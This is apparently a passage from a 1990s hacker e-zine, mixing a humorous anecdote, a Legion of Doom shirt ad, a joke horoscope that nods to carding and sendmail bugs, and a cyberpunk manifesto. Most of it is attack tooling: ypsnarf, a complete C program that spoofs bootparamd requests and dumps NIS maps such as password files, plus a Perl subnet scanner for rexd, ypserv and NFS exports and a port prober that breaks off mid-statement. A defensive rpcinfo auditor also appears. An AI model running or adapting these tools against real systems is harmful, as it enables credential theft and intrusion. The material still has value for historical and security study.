ME: "No really, tell me, why?" 

MG: "Please leave before I call mall security." 

ME: "Excuse me?" 

MG: "Please leave before I call mall security."

ME: "What the hell for?" 

MG: "Please, sir." 

ME: "Uh, go ahead, call them." 

MG: "Would you please just leave?" 

ME: "No."

MG: "Fine, have it your way then." 

ME: "No, that’s Burger King, isn’t it?" 

At this point he BACKS away from me and calls mall security on the phone
around the corner. I have two people STARING at me from the dining area,
and I begin laughing out loud, just for effect. A few minutes later this
45 year oldish guy comes in and says [at the other end of counter, in a
whisper]


SG: "Yeah, Mike, what’s up?"

MG: "This guy is trying to give me some [pause] funny money."

SG: "Really? What?"

MG: "Get this, a *two* dollar bill."

SG: "Why would a guy fake a $2 bill?" [incredulous]

MG: "I don’t know? He’s kinda weird. Says the only other thing he has is
a fifty."

SG: "So, the fifty’s fake?"

MG: "NO, the $2 is."

SG: "Why would he fake a $2 bill?"

MG: "I don’t know. Can you talk to him, and get him out of here?"

SG: "Yeah..."


Security guard walks over to me and says




SG: "Mike here tells me you have some fake bills you’re trying to use." 
ME: "Uh, no."

SG: "Lemme see ’em." 

ME: "Why?" 

SG: "Do you want me to get the cops in here?" 

At this point I was ready to say, "SURE, PLEASE," but I wanted to eat, so
I said


ME: "I’m just trying to buy a burrito and pay for it with this $2 bill."


I put the bill up near his face, and he flinches like I was taking a 
swing at him. He takes the bill, turns it over a few times in his hands, 
and says 


SG: "Mike, what’s wrong with this bill?" 

MG: "It’s fake."

SG: "It doesn’t look fake to me."

MG: "But it’s a **$2** bill."

SG: "Yeah?" 

MG: "Well, there’s no such thing, is there?" 


The security guard and I both looked at him like he was an idiot, and it 
dawned on the guy that he had no clue. 


My burrito was free and he threw in a small drink and those cinnamon 
things, too. Makes me want to get a whole stack of $2 bills just to see 
what happens when I try to buy stuff. If I got the right group of 
people, I could probably end up in jail. At least you get free food. 


The official Legion of Doom t-shirts are still available.
Join the net.luminaries world-wide in owning one of
these amazing shirts. Impress members of the opposite sex, increase
your IQ, annoy system administrators, get raided by the government and
lose your wardrobe!


Can a t-shirt really do all this? Of course it can! 


"THE HACKER WAR -- LOD vs MOD" 


This t-shirt chronicles the infamous "Hacker War" between rival
groups The Legion of Doom and The Masters of Destruction. The front
of the shirt displays a flight map of the various battle-sites
hit by MOD and tracked by LOD. The back of the shirt
has a detailed timeline of the key dates in the conflict, and
a rather ironic quote from an MOD member.


(For a limited time, the original is back!) 


"LEGION OF DOOM -- INTERNET WORLD TOUR" 

The front of this classic shirt displays "Legion of Doom Internet World
Tour" as well as a sword and telephone intersecting the planet
earth, skull-and-crossbones style. The back displays the
words "Hacking for Jesus" as well as a substantial list of "tour-stops"
(internet sites) and a quote from Aleister Crowley.


All t-shirts are sized XL, and are 100% cotton. 


Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt 
postage. 


Send checks or money orders. Please, no credit cards, even if 
it’s really your card. 


Name:              ______________________________________________

Address:           ______________________________________________

City, State, Zip:  ______________________________________________


I want ____ "Hacker War" shirt(s)

I want ____ "Internet World Tour" shirt(s)

Enclosed is $______ for the total cost.


Mail to:   Chris Goggans
           603 W. 13th #1A-278
           Austin, TX 78701


These T-shirts are sold only as novelty items, and are in no way
attempting to glorify computer crime.


introducing...


The PHRACK Horoscope, Summer 1994


Foreseen in long nights of nocturnal lubrication by Onkel Dittmeyer


Do you believe in the stars? Many do, some don’t. In fact, the stars
can tell you a whole lot about the future. That’s bullshit? You don’t
believe it? Good. Be doomed. See you in hell. Here’s the official PHRACK
horoscope for all eleet hackerz for the summer of 1994.



You can use this chart to find out your zodiac sign by your DOB. 

Aquarius..... 01/20 - 02/18        Leo.......... 07/23 - 08/22
Pisces....... 02/19 - 03/20        Virgo........ 08/23 - 09/22
Aries........ 03/21 - 04/19        Libra........ 09/23 - 10/22
Taurus....... 04/20 - 05/20        Scorpio...... 10/23 - 11/21
Gemini....... 05/21 - 06/20        Sagittarius.. 11/22 - 12/21
Cancer....... 06/21 - 07/22        Capricorn.... 12/22 - 01/19

oOo This summer’s best combinations oOo

YOU            LOVE           BS VICTIM      HOT WAREZ
Aquarius       Libra          Leo            Sagittarius
Pisces         Sagittarius    Aquarius       Cancer
Aries          Aries          Cancer         Capricorn
Taurus         Gemini         Pisces         Taurus
Gemini         Cancer         Aries          Scorpio
Cancer         Leo            Virgo          Gemini
Leo            Scorpio        Gemini         Leo
Virgo          Capricorn      Sagittarius    Libra
Libra          Virgo          Libra          Virgo
Scorpio        Pisces         Capricorn      Pisces
Sagittarius    Aquarius       Scorpio        Aquarius
Capricorn      Taurus         Taurus         Aries


And Now... The 3133t And Official PHRACK Summer 1994 Horoscope!


Aries [March 21st - April 19th]


There is a pot full of kO0DeZ at the end of the rainbow for you.
Try to channel all your ambition on finding it, hint: you won’t
find it in /bin/gif/kitchen.gear.
Warning: Risk of bust between August 5th and August 10th!
Luck [oooo.] - Wealth [oo...] - Bust risk [ooo..] - Love | Boene eral |


Taurus [April 20th - May 20th]


PhedZzZz are lurking behind Saturn, obscured behind one of the rings.
Be sure to *67 all your calls, and you’ll be fine. Hint: Don’t undertake
any interstellar space travel, and avoid big yellow ships.
Watch out for SprintNet Security between July 12th and August 1st.
Luck [oo...] - Wealth [oo...] - Bust risk [oooo.] - Love [ooo..]


Gemini [May 21st - June 20th]


There might be a force dragging you into warez boards. Try to resist
the attraction, or you might be thrown out of the paradise.
Hint: If a stranger with a /ASL connect crosses your way, stay away
from him.
Warning: Your Dual Standard HST might explode sometime in June.
Luck [o....] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]


Cancer [June 21st - July 22nd] 
There are dark forces on your trail. Try to avoid all people wearing 
suits, don’t get in their cars, and don’t let them give you shit. 
Hint: Leave the country as soon as you can, or you won’t be able to.
Look out for U4EA on IRC in late July, you might get /killed.
Luck [o....] - Wealth [oo...] - Bust risk [ooooo] - Love [oo...]


Leo [July 23rd - August 22nd]


The path of Venus this year tells us that there is love on the way
for you. Don’t look for it on X-rated ftp sites, it might be out there
somewhere. Hint: Try getting out of the house more frequently or you
might miss it.
Warning: If Monica Weaver comes across your way, break and run!
Luck [ooo..] - Wealth [o....] - Bust risk [oo...] - Love [oooo.]


Virgo [August 23rd - September 22nd]


Pluto tells us that you should stay away from VAXes in the near future. 
Lunatic force tells us that you might have more luck on Berkeley UNIX. 
Hint: Try to go beyond cat /etc/passwd. Explore sendmail bugs. 

Warning: In the first week of October, there is a risk of being ANIed. 
Luck [oooo.] - Wealth [oo...] - Bust risk [oo...] - Love [o....]


Libra [September 23rd - October 22nd] 


The closer way of Mars around the Sun this year might mean that you 
will be sued by a telco or a big corporation. The eclipse of Uranus 
could say that you might have some luck and card a VGA 486 Laptop. 
Hint: Be careful on the cordless. 

Watch out for good stuff in dumpsters between July 23rd and July 31st. 
Luck [oo...] - Wealth [o....] - Bust risk [oooo.] - Love [oo...]


Scorpio [October 23rd - November 21st] 


Sun propulsions say that you should spend more time exploring the 
innards of credit report systems, but be aware that Saturn reminds 
you that one local car dealer has his I.D. monitored. 

Hint: Stay out of #warez 
Warning: A star called 43-141 might be your doom. Watch out. 
Luck [ooo..] - Wealth [oooo.] - Bust risk [oo...] - Love [oo...]


Sagittarius [November 22nd - December 21st] 


Cold storms on Pluto suggest that you don’t try to play eleet 
anarchist on one of the upcoming cons. Pluto also sees that there 
might be a slight chance that you catch a bullet pestering a cop. 
Hint: Be nice to your relatives. 

You might get lucky BSing during the third week of August. 

Luck [o....] - Wealth [oo...] - Bust risk [ooo..] - Love [oo...]


Capricorn [December 22nd - January 19th]


This summer brings luck to you. Everything you try is about to work 
out. You might find financial gain in selling k0ODeZ to local warez 
bozos. Hint: Don’t try to BS at a number who is a prime number, they 
will trace your ass and beat you to death with a raw cucumber. 
Special kick of luck between June 14th and July 2nd. 

Luck [ooooo] - Wealth [oooo.] - Bust risk [oo...] - Love [ooo..]


Aquarius [January 20th - February 18th] 


The third moon of Saturn suggests to stay in bed over the whole
summer, or everything will worsen. Avoid to go to any meetings
and cons. Do not try to get up before September 11th.
Hint: You can risk to call PRODIGY and have a gR3aT time.
Warning: High chance of eavesdropping on your line on August 14th.
Luck: 'Piscar vs ] - Wealth [o....] - Bust risk [ooooo] - Love [o....]


Pisces [February 19th - March 20th] 


Mars reads a high mobility this summer. You should try to go to a 
foreign country, maybe visit HEU II. Finances will be OK. Do not go
on any buses for that might be your doom.

Hint: Don’t get a seat near a window, whatever you do. 

Warning: Avoid 6’8" black guys in Holland, they might go for your ass. 


Luck [ooo..] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]


If your horoscope does not come true, complain to god@heaven.mil. 31337
If it does, you are welcome to report it to onkeld@ponton.hanse.de. 43V3R


The SenseReal Mission 

If you are reading this it indicates you have reached a point 
along your journey that you will have to decide whether you agree 
with The SenseReal Foundation or whether you think that those who 
believe and support The SenseReal Foundation are crazy. Your 
decision to join The SenseReal Foundation on its mission will
undoubtedly change your life forever. When you understand the 
reason it exists and what it seeks you will better know how to 
decide. That is why this text was created. 

He is known as Green Ghost. Some know him as Jim Nightshade. He 
was born in 1966. He is not a baby boomer and he is not a 
Generation Xer. He falls into that group of the population that 
has so far escaped definition. He is a Cyberpunk. He was Cyberpunk
before Cyberpunk was cool. He is the founder and leader of The
SenseReal Foundation. You will learn more about him later. 

But first you will have to know about the background. There once 
was a man named Albert Hofmann. In 1943, on April 16, Hofmann
absorbed a threshold amount of the drug known as LSD. He 
experienced "a peculiar restlessness". LSD since that time has 
played an important role in this world. 

There are other agents involved in the story. Mary Pinchot, JFK, 
Nixon, Charles Manson, Jimi Hendrix, Timothy Leary, Elvis Presley 
and many others. There are too many details and explanations 
necessary to explain everything here. But this does not matter. 

Because the SenseReal Foundation is about riding the wave. We 
believe that the ultimate goal cannot be defined. To define it 
would be to destroy it. 

The SenseReal Foundation hopes that things can be changed for 
the better. But we realize that the situation can become 
much worse. From what history teaches us and what we instinctively 
feel, we know that there is a great probability that things will 
get much worse before and if things ever get better. Doom looms 
on the horizon like an old friend. 

Freedom is being threatened every day and The SenseReal
Foundation seeks to defend and seek Freedom. Big Brother is here
NOW and to deny his existence is only to play into his hand. The
goal of our government both here in America and worldwide is to
remain in power and increase its control of The People. To
expose Big Brother and destroy him is one of the many goals of 
The SenseReal Foundation. 

As a member of Cyberspace and an agent of The SenseReal
Foundation you will have to carefully consider your interaction 
with the flow of Info. The ideals of Liberty must be maintained. 
The SenseReal Foundation provides a grounding point. The place 
where the spark transfers from plasma to light and back to plasma. 
Tesla was not on the wrong track. The SenseReal Foundation is a 
mechanism which seeks to increase Freedom. Only by learning more 
can we defeat the Evil. The Good must prevail. 
If you have the Hacker spirit and think along the same lines 
then The SenseReal Foundation may be your calling. If you think 
like J.R. Dobbs or Green Ghost then it is possible we can make it 
through The Apocalypse. A final date has never been announced for
this event. Green Ghost does not claim to know the exact date but
he does claim to have some Info on it.

Green Ghost does not claim to have all the answers or even to 
know all the questions. He was first exposed to computers in the 
early 70’s at his local high school. The first computer he ever 
used was a Honeywell terminal connected to a mainframe operated 
at the home office of Honeywell and operated for the school. 

This machine was programmed by feeding it stacks of cards with
boxes X'd out with a No. 2 pencil. It did have a keyboard hooked
up to a printer which served for the monitor. The text was typed
out and the paper rolled out of the machine in great waves.
This experience left him wanting more. Somewhere between the
machine and the mind were all the questions and all the answers. 

The SenseReal Foundation will supply some of the means. We 
must all work together if we are to succeed. UNITED WE STAND, 
DIVIDED WE FALL. If you wish to participate with The SenseReal 
Foundation you must devote yourself to becoming an Info Agent. 

As an Info Agent it is your duty to seek Truth and Knowledge 
out wherever it is located. To Learn and to seek to increase 
the Learning of all at The SenseReal Foundation. Different 
people will be needed to help out in different ways. 

SenseReal’s Info Agents are located all around the world and 
are in contact with fellow SenseReal members via any one of 
several SenseReal facilities. The primary establishment and 
headquarters of The SenseReal Foundation is SenseReal’s own 
online system: 

[Banner, illegible in this copy: name and dial-up number of The /-/acker's /\/\ansion]
27 Hours Per Day /14.4 Supra /Home of The SenseReal Foundation 
Also contact via SenseReal’s mail drop by writing or sending 
materials to: TSF \ Electronic Mail: 
P.O. BOX 6914 \ Green_Ghost@neonate.atl.ga.us 
HILTON HEAD, SC 29938-6914 \ 

The Hacker’s /\/\ansion is a system like no other. While it is 
not your typical Hackers board it has much Info on Hacking. While 
it is not like any Adult system you’ve ever seen it has the most 
finest Adult material available anywhere. It is not a Warez board 
but we are definitely Pirates. Because we are Cyberpunks. What
makes the Hacker's Mansion different is our emphasis on quality.
Everything that you find at The /-/acker's /\/\ansion is 1ST
Class. All the coolest E-zines are pursued here. Phrack, CUD, and
Thought Virus to name just a few. Of course there is one other 
source for Thought Virus: 

Send E-Mail to: ListServ@neonate.atl.ga.us 
In the subject or body of the message write:

        FAQ ThoughtCriminals

and you will receive the current issue in your E-Mail box in no
time. If you wish to join the Thought Criminals mailing list and
communicate with your fellow Thought Criminals via E-Mail then
send another message to: ListServ@neonate.atl.ga.us

and write the following in the subject or body of the message:

        Subscribe ThoughtCriminals Your-Address-Here
or simply: Subscribe ThoughtCriminals

To mail others on the Thought Criminals mailing list send a message
to: ThoughtCriminals@neonate.atl.ga.us

Tell us all. Communication is vital. Our survival may depend on
it. The SenseReal Foundation is about the allegiance of many
people, and indeed beings, as our friends from other planets can
tell you. The EFF inspired us and was a model but we don't have
the EFF's money so we need YOU. If you are someone who can
contribute or who believes in The Cause or are just interested
in Tax Resistance or the Free The Weed movement then you should
join The SenseReal Foundation today. Contact us through any of
the above channels and become a Freedom Fighter today. Time is of
the essence.


/*
 * ypsnarf - exercise security holes in yp/nis.
 *
 * Based on code from Dan Farmer (zen@death.corp.sun.com) and Casper Dik
 * (casper@fwi.uva.nl).
 *
 * Usage:
 *      ypsnarf server client
 *              - to obtain the yp domain name
 *      ypsnarf server domain mapname
 *              - to obtain a copy of a yp map
 *      ypsnarf server domain maplist
 *              - to obtain a list of yp maps
 *
 * In the first case, we lie and pretend to be the host "client", and send
 * a BOOTPARAMPROC_WHOAMI request to the host "server". Note that for this
 * to work, "server" must be running rpc.bootparamd, and "client" must be a
 * diskless client of (well, it must boot from) "server".
 *
 * In the second case, we send a YPPROC_DOMAIN request to the host "server",
 * asking if it serves domain "domain". If so, we send YPPROC_FIRST and
 * YPPROC_NEXT requests (just like "ypcat") to obtain a copy of the yp map
 * "mapname". Note that you must specify the full yp map name, you cannot
 * use the shorthand names provided by "ypcat".
 *
 * In the third case, the special map name "maplist" tells ypsnarf to send
 * a YPPROC_MAPLIST request to the server and get the list of maps in domain
 * "domain", instead of getting the contents of a map. If the server has a
 * map called "maplist" you can't get it. Oh well.
 *
 * Since the callrpc() routine does not make any provision for timeouts, we
 * artificially impose a timeout of YPSNARF_TIMEOUT1 seconds during the
 * initial requests, and YPSNARF_TIMEOUT2 seconds during a map transfer.
 *
 * This program uses UDP packets, which means there's a chance that things
 * will get dropped on the floor; it's not a reliable stream like TCP. In
 * practice though, this doesn't seem to be a problem.
 *
 * To compile:
 *      cc -o ypsnarf ypsnarf.c -lrpcsvc
 *
 * [notice partly illegible in this copy: DO NOT ... THEM. PLEASE ...
 *  RUST COMPLET ... ILL S$! ... BLY.]
 *
 * Engineering Computer Network
 * Engineering Building
 * West Lafayette, IN 47907
 * davy@ecn.purdue.edu
 * January, 1991
 */
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <rpc/rpc.h>
#include <rpcsvc/bootparam.h>
#include <rpcsvc/yp_prot.h>
#include <rpc/pmap_clnt.h>
#include <sys/time.h>
#include <signal.h>
#include <string.h>
#include <netdb.h>
#include <stdio.h>

#define BOOTPARAM_MAXDOMAINLEN  32      /* from rpc.bootparamd          */
#define YPSNARF_TIMEOUT1        15      /* timeout for initial request  */
#define YPSNARF_TIMEOUT2        30      /* timeout during map transfer  */

char *pname;                            /* program name                 */

main(argc, argv)
char **argv;
int argc;
{
    char *server, *client, *domain, *mapname;

    pname = *argv;

    /*
     * Process arguments. This is less than robust, but then
     * hey, you're supposed to know what you're doing.
     */
    switch (argc) {
    case 3:
        server = *++argv;
        client = *++argv;

        get_yp_domain(server, client);
        exit(0);
    case 4:
        server = *++argv;
        domain = *++argv;
        mapname = *++argv;

        if (strcmp(mapname, "maplist") == 0)
            get_yp_maplist(server, domain);
        else
            get_yp_map(server, domain, mapname);
        exit(0);
    default:
        fprintf(stderr, "Usage: %s server client -", pname);
        fprintf(stderr, "to obtain yp domain name\n");
        fprintf(stderr, "       %s server domain mapname -", pname);
        fprintf(stderr, "to obtain contents of yp map\n");
        exit(1);
    }
}

/*
 * get_yp_domain - figure out the yp domain used between server and
 *                 client.
 */
get_yp_domain(server, client)
char *server, *client;
{
    long hostip;
    struct hostent *hp;
    bp_whoami_arg w_arg;
    bp_whoami_res w_res;
    extern void timeout();
    enum clnt_stat errcode;

    /*
     * Just a sanity check, here.
     */
    if ((hp = gethostbyname(server)) == NULL) {
        fprintf(stderr, "%s: %s: unknown host.\n", pname, server);
        exit(1);
    }

    /*
     * Allow the client to be either an internet address or a
     * host name. Copy in the internet address.
     */
    if ((hostip = inet_addr(client)) == -1) {
        if ((hp = gethostbyname(client)) == NULL) {
            fprintf(stderr, "%s: %s: unknown host.\n", pname,
                    client);
            exit(1);
        }

        bcopy(hp->h_addr_list[0],
              (caddr_t) &w_arg.client_address.bp_address.ip_addr,
              hp->h_length);
    }
    else {
        bcopy((caddr_t) &hostip,
              (caddr_t) &w_arg.client_address.bp_address.ip_addr,
              sizeof(ip_addr_t));
    }

    w_arg.client_address.address_type = IP_ADDR_TYPE;
    bzero((caddr_t) &w_res, sizeof(bp_whoami_res));

    /*
     * Send a BOOTPARAMPROC_WHOAMI request to the server. This will
     * give us the yp domain in the response, IFF client boots from
     * the server.
     */
    signal(SIGALRM, timeout);
    alarm(YPSNARF_TIMEOUT1);

    errcode = callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS,
                      BOOTPARAMPROC_WHOAMI, xdr_bp_whoami_arg, &w_arg,
                      xdr_bp_whoami_res, &w_res);

    alarm(0);

    if (errcode != RPC_SUCCESS)
        print_rpc_err(errcode);

    /*
     * Print the domain name.
     */
    printf("%.*s", BOOTPARAM_MAXDOMAINLEN, w_res.domain_name);

    /*
     * The maximum domain name length is 255 characters, but the
     * rpc.bootparamd program truncates anything over 32 chars.
     */
    if (strlen(w_res.domain_name) >= BOOTPARAM_MAXDOMAINLEN)
        printf(" (truncated?)");

    /*
     * Put out the client name, if they didn't know it.
     */
    if (hostip != -1)
        printf(" (client name = %s)", w_res.client_name);

    putchar('\n');
}

/*
 * get_yp_map - get the yp map "mapname" from yp domain "domain" from server.
 */
get_yp_map(server, domain, mapname)
char *server, *domain, *mapname;
{
    char *reqp;
    bool_t yesno;
    u_long calltype;
    bool_t (*xdr_proc)();
    extern void timeout();
    enum clnt_stat errcode;
    struct ypreq_key keyreq;
    struct ypreq_nokey nokeyreq;
    struct ypresp_key_val answer;

    /*
     * This code isn't needed; the next call will give the same
     * error message if there's no yp server there.
     */
#ifdef not_necessary
    /*
     * "Ping" the yp server and see if it's there.
     */
    signal(SIGALRM, timeout);
    alarm(YPSNARF_TIMEOUT1);

    errcode = callrpc(server, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
                      xdr_void, 0);

    alarm(0);

    if (errcode != RPC_SUCCESS)
        print_rpc_err(errcode);
#endif

    /*
     * Figure out whether server serves the yp domain we want.
     */
    signal(SIGALRM, timeout);
    alarm(YPSNARF_TIMEOUT1);

    errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
                      xdr_wrapstring, (caddr_t) &domain, xdr_bool,
                      (caddr_t) &yesno);

    alarm(0);

    if (errcode != RPC_SUCCESS)
        print_rpc_err(errcode);

    if (yesno == FALSE) {
        fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
                server, domain);
        exit(1);
    }

    /*
     * Now we just read entry after entry... The first entry we
     * get with a nokey request.
     */
    keyreq.domain = nokeyreq.domain = domain;
    keyreq.map = nokeyreq.map = mapname;
    reqp = (caddr_t) &nokeyreq;
    keyreq.keydat.dptr = NULL;

    answer.status = TRUE;
    calltype = YPPROC_FIRST;
    xdr_proc = xdr_ypreq_nokey;

    while (answer.status == TRUE) {
        bzero((caddr_t) &answer, sizeof(struct ypresp_key_val));

        signal(SIGALRM, timeout);
        alarm(YPSNARF_TIMEOUT2);

        errcode = callrpc(server, YPPROG, YPVERS, calltype, xdr_proc,
                          reqp, xdr_ypresp_key_val, &answer);

        alarm(0);

        if (errcode != RPC_SUCCESS)
            print_rpc_err(errcode);

        /*
         * Got something; print it.
         */
        if (answer.status == TRUE) {
            printf("%.*s\n", answer.valdat.dsize,
                   answer.valdat.dptr);
        }

        /*
         * Now we're requesting the next item, so have to
         * send back the current key.
         */
        calltype = YPPROC_NEXT;
        reqp = (caddr_t) &keyreq;
        xdr_proc = xdr_ypreq_key;

        if (keyreq.keydat.dptr)
            free(keyreq.keydat.dptr);

        keyreq.keydat = answer.keydat;

        if (answer.valdat.dptr)
            free(answer.valdat.dptr);
    }
}

/*
 * get_yp_maplist - get the yp map list for yp domain "domain" from server.
 */
get_yp_maplist(server, domain)
char *server, *domain;
{
    bool_t yesno;
    extern void timeout();
    struct ypmaplist *mpl;
    enum clnt_stat errcode;
    struct ypresp_maplist maplist;

    /*
     * This code isn't needed; the next call will give the same
     * error message if there's no yp server there.
     */
#ifdef not_necessary
    /*
     * "Ping" the yp server and see if it's there.
     */
    signal(SIGALRM, timeout);
    alarm(YPSNARF_TIMEOUT1);

    errcode = callrpc(server, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
                      xdr_void, 0);

    alarm(0);

    if (errcode != RPC_SUCCESS)
        print_rpc_err(errcode);
#endif

    /*
     * Figure out whether server serves the yp domain we want.
     */
    signal(SIGALRM, timeout);
    alarm(YPSNARF_TIMEOUT1);

    errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
                      xdr_wrapstring, (caddr_t) &domain, xdr_bool,
                      (caddr_t) &yesno);

    alarm(0);

    if (errcode != RPC_SUCCESS)
        print_rpc_err(errcode);

    /*
     * Nope
     */
    if (yesno == FALSE) {
        fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
                server, domain);
        exit(1);
    }

    maplist.list = (struct ypmaplist *) NULL;

    /*
     * Now ask for the list.
     */
    signal(SIGALRM, timeout);
    alarm(YPSNARF_TIMEOUT1);

    errcode = callrpc(server, YPPROG, YPVERS, YPPROC_MAPLIST,
                      xdr_wrapstring, (caddr_t) &domain,
                      xdr_ypresp_maplist, &maplist);

    alarm(0);

    if (errcode != RPC_SUCCESS)
        print_rpc_err(errcode);

    if (maplist.status != YP_TRUE) {
        fprintf(stderr, "%s: cannot get map list: %s\n", pname,
                yperr_string(ypprot_err(maplist.status)));
        exit(1);
    }

    /*
     * Print out the list.
     */
    for (mpl = maplist.list; mpl != NULL; mpl = mpl->ypml_next)
        printf("%s\n", mpl->ypml_name);
}

/*
 * print_rpc_err - print an rpc error and exit.
 */
print_rpc_err(errcode)
enum clnt_stat errcode;
{
    fprintf(stderr, "%s: %s\n", pname, clnt_sperrno(errcode));
    exit(1);
}

/*
 * timeout - print a timeout and exit.
 */
void timeout()
{
    fprintf(stderr, "%s: RPC request (callrpc) timed out.\n", pname);
    exit(1);
}


#!/bin/perl -s
#
# Scan a subnet for valid hosts; if given hostname, will look at the
# 255 possible hosts on that net. Report if host is running rexd or
# ypserv.
#
# Usage: scan n.n.n.n

# mine, by default
$default = "130.80.26";

$| = 1;

if ($v) { $verbose = 1; }

if ($#ARGV == -1) { $root = $default; }
else { $root = $ARGV[0]; }

# ip address
if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) {
    ($na, $ad, $ty, $le, @host_ip) = gethostbyname($root);
    ($one,$two,$three,$four) = unpack('C4',$host_ip[0]);
    $root = "$one.$two.$three";
    if ($root eq "..") { die "Can't figure out what to scan...\n"; }
}

print "Subnet $root:\n" if $verbose;

for $i (01..255) {
    print "Trying $root.$i\t=> " if $verbose;
    &resolve("$root.$i");
}

#
# Do the work
#
sub resolve {

    local($name) = @_;

    # ip address
    if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) {
        ($a,$b,$c,$d) = split(/\./, $name);
        @ip = ($a,$b,$c,$d);
        ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET);
    }
    else {
        ($name, $aliases, $type, $len, @ip) = gethostbyname($name);
        ($a,$b,$c,$d) = unpack('C4',$ip[0]);
    }

    if ($name && @ip) {
        print "$a.$b.$c.$d\t$name\n";
        system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"Running ypserv.\"\nfi\nfi");
    }
    else { print "unable to resolve address\n" if $verbose; }

}

sub AF_INET {2;}
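The same three RPC program numbers can be checked from the administrator's side. The C program below is an added example, not part of the original article or of any tool printed here: it reads the text of `rpcinfo -p` taken on a host you run and reports which of the services ypsnarf and the scan script look for are registered. The sample listing is constructed, and the names `audit_rpcinfo`, `RISKY` and `SAMPLE` are hypothetical; 100026 is the standard program number for bootparamd, which the page itself does not print.

```c
#include <stdio.h>
#include <string.h>

/* RPC programs the scan script asks about, plus bootparamd (100026), which
 * the first mode of ypsnarf relies on. */
struct risky { unsigned long prog; const char *name; const char *why; };
static const struct risky RISKY[] = {
    { 100004UL, "ypserv",     "hands out NIS maps to a caller that names the domain" },
    { 100005UL, "mountd",     "export list can be read with showmount -e" },
    { 100017UL, "rexd",       "remote execution daemon, reported by the scan script" },
    { 100026UL, "bootparamd", "WHOAMI reply discloses the NIS domain name" },
};
#define NRISKY (sizeof RISKY / sizeof RISKY[0])

struct finding { const struct risky *svc; int udp, tcp; };

/* Constructed sample of `rpcinfo -p` output; not taken from a real host. */
static const char SAMPLE[] =
    "   program vers proto   port  service\n"
    "    100000    2   tcp    111  portmapper\n"
    "    100000    2   udp    111  portmapper\n"
    "    100004    2   udp    660  ypserv\n"
    "    100004    1   udp    660  ypserv\n"
    "    100004    2   tcp    661  ypserv\n"
    "    100003    2   udp   2049  nfs\n"
    "    100005    1   udp    745  mountd\n"
    "    100026    1   udp    755  bootparam\n";

/* Parse rpcinfo -p text and fill out[] with one entry per risky program,
 * merging versions and recording which transports are registered.
 * Returns the number of findings (at most max). */
static int audit_rpcinfo(const char *text, struct finding *out, int max)
{
    int n = 0;

    while (*text) {
        size_t len = strcspn(text, "\n"), i;
        unsigned long prog, vers;
        unsigned port;
        char line[128], proto[8];

        if (len < sizeof line) {
            memcpy(line, text, len);
            line[len] = '\0';
            /* The header row fails the numeric conversion and is skipped. */
            if (sscanf(line, "%lu %lu %7s %u", &prog, &vers, proto, &port) == 4) {
                for (i = 0; i < NRISKY; i++) {
                    int j = 0;
                    if (RISKY[i].prog != prog)
                        continue;
                    while (j < n && out[j].svc != &RISKY[i])
                        j++;
                    if (j == n) {            /* first time we see this program */
                        if (n == max)
                            break;
                        out[n].svc = &RISKY[i];
                        out[n].udp = out[n].tcp = 0;
                        n++;
                    }
                    if (strcmp(proto, "udp") == 0) out[j].udp = 1;
                    if (strcmp(proto, "tcp") == 0) out[j].tcp = 1;
                }
            }
        }
        text += len;
        if (*text == '\n')
            text++;
    }
    return n;
}

int main(void)
{
    struct finding f[NRISKY];
    int i, n = audit_rpcinfo(SAMPLE, f, (int) NRISKY);

    for (i = 0; i < n; i++)
        printf("%-10s (%lu)%s%s: %s\n", f[i].svc->name, f[i].svc->prog,
               f[i].udp ? " udp" : "", f[i].tcp ? " tcp" : "", f[i].svc->why);
    return n ? 1 : 0;   /* non-zero exit when something needs attention */
}
```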


/*
 * probe_tcp_ports
 */

#include <sys/types.h>
#include <sys/stat.h>
#include <stdio.h>
#include <ctype.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define RETURN_ERR -1
#define RETURN_FAIL 0
#define RETURN_SUCCESS 1

int Debug;
int Hack;
int Verbose;

main(ArgC, ArgV)
    int ArgC;
    char **ArgV;
{
    int Index;
    int SubIndex;

    for (Index = 1; (Index < ArgC) && (ArgV[Index][0] == '-'); Index++)
        for (SubIndex = 1; ArgV[Index][SubIndex]; SubIndex++)
            switch (ArgV[Index][SubIndex])
            {
            case 'd':
                Debug++;
                break;
            case 'h':
                Hack++;
                break;
            case 'v':
                Verbose++;
                break;
            default:
                (void) fprintf(stderr,
                    "Usage: probe_tcp_ports [-dhv] [hostname [hostname ...] ]\n");
                exit(1);
            }

    for (; Index < ArgC; Index++)
        (void) Probe_TCP_Ports(ArgV[Index]);
    exit(0);
}

Probe_TCP_Ports(Name)
    char *Name;
{
    unsigned Port;
    char *Host;
    struct hostent *HostEntryPointer;
    struct sockaddr_in SocketInetAddr;
    struct hostent TargetHost;
    struct in_addr TargetHostAddr;
    char *AddressList[1];
    char NameBuffer[128];
    extern int inet_addr();
    extern char *rindex();

    if (Name == NULL)
        return (RETURN_FAIL);
    Host = Name;
    if (Host == NULL)
        return (RETURN_FAIL);

    HostEntryPointer = gethostbyname(Host);
    if (HostEntryPointer == NULL)
    {
        /* Not a resolvable name; accept a dotted-quad address instead. */
        TargetHostAddr.s_addr = inet_addr(Host);
        if (TargetHostAddr.s_addr == -1)
        {
            (void) printf("unknown host: %s\n", Host);
            return (RETURN_FAIL);
        }
        /* Bounded copy: the argument may be longer than NameBuffer. */
        (void) strncpy(NameBuffer, Host, sizeof(NameBuffer) - 1);
        NameBuffer[sizeof(NameBuffer) - 1] = '\0';
        TargetHost.h_name = NameBuffer;
        TargetHost.h_addr_list = AddressList, TargetHost.h_addr =
